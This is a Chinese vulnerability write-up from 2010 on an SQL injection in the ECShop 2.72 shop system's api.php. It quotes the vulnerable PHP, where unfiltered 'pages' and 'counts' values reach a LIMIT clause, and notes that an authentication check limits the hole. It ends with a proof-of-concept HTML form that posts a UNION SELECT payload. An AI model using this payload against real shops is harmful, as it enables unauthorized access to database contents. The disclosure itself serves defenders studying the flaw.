Ecshop 2.72 网上商店系统鸡肋注入漏洞:
by:xhm1n9 2010.11.11
最近好像ecshop的问题蛮多的啊,看到T00LS有人发测试图出来,我也下了份来看看,看到一鸡肋注入。我没留意之前有没人发过此漏洞,见谅了。
/api.php
.........................
switch ($_POST['act'])
{
case 'search_goods_list': search_goods_list(); break;
//............................
default: api_err('0x008', 'no this type api'); //输出系统级错误:数据异常
}
.........................
function search_goods_list()
{
check_auth(); //检查基本权限 ~~~鸡肋了
$version = '1.0'; //版本号
if ($_POST['api_version'] != $version) //网店的接口版本低
{
api_err('0x008', 'a low version api');
}
if (is_numeric($_POST['last_modify_st_time']) && is_numeric($_POST['last_modify_en_time']))
{
$sql = 'SELECT COUNT(*) AS count' .
' FROM ' . $GLOBALS['ecs']->table('goods') .
" WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)";
$date_count = $GLOBALS['db']->getRow($sql);
if (empty($date_count))
{
api_err('0x003', 'no data to back'); //无符合条件数据
}
$page = empty($_POST['pages']) ? 1 : $_POST['pages']; //没过滤
$counts = empty($_POST['counts']) ? 100 : $_POST['counts']; //没过滤
$sql = 'SELECT goods_id, last_update AS last_modify' .
' FROM ' . $GLOBALS['ecs']->table('goods') .
" WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)".
" LIMIT ".($page - 1) * $counts . ', ' . $counts; //$counts也没用单引号包含
$date_arr = $GLOBALS['db']->getAll($sql);
..............................
}
function check_auth()
{
$license = get_shop_license();// 取出网店 license信息
if (empty($license['certificate_id']) || empty($license['token']) || empty($license['certi']))
{
api_err('0x006', 'no certificate'); //没有证书数据,输出系统级错误:用户权限不够
}
if (!check_shopex_ac($_POST, $license['token']))
{
api_err('0x009'); //输出系统级错误:签名无效
}
/* 对应用申请的session进行验证 */
$certi['certificate_id'] = $license['certificate_id']; // 网店证书ID
$certi['app_id'] = 'ecshop_b2c'; // 说明客户端来源
$certi['app_instance_id'] = 'webcollect'; // 应用服务ID
$certi['version'] = VERSION . '#' .RELEASE; // 网店软件版本号
$certi['format'] = 'json'; // 官方返回数据格式
$certi['certi_app'] = 'sess.valid_session'; // 证书方法
$certi['certi_session'] = $_POST['app_session']; //应用服务器申请的session值
$certi['certi_ac'] = make_shopex_ac($certi, $license['token']); // 网店验证字符串
$request_arr = exchange_shop_license($certi, $license);
if ($request_arr['res'] != 'succ')
{
api_err('0x001', 'session is invalid'); //输出系统级错误:身份验证失败
}
}
function get_shop_license()
{
// 取出网店 license
$sql = "SELECT code, value
FROM " . $GLOBALS['ecs']->table('shop_config') . "
WHERE code IN ('certificate_id', 'token', 'certi')
LIMIT 0,3";
$license_info = $GLOBALS['db']->getAll($sql);
$license_info = is_array($license_info) ? $license_info : array();
$license = array();
foreach ($license_info as $value)
{
$license[$value['code']] = $value['value'];
}
return $license;
}
鸡肋的是check_auth()作了权限检查
Exp:
<form name="p_form" id="p_form" method="post" action="http://127.0.0.1/ecshop2.72/api.php" enctype="multipart/form-data">
<input name='act' type="text" value="search_goods_list">
<input name='api_version' type="text" value="1.0">
<input name='last_modify_st_time' type="text" value="1">
<input name='last_modify_en_time' type="text" value="1">
<input name='pages' type="text" value="">
<input name='ac' type="text" value="ac">
<input name='counts' type="text" value="1 union select user(),2">
<input name="sub" type="submit" value="提交" />
</form> |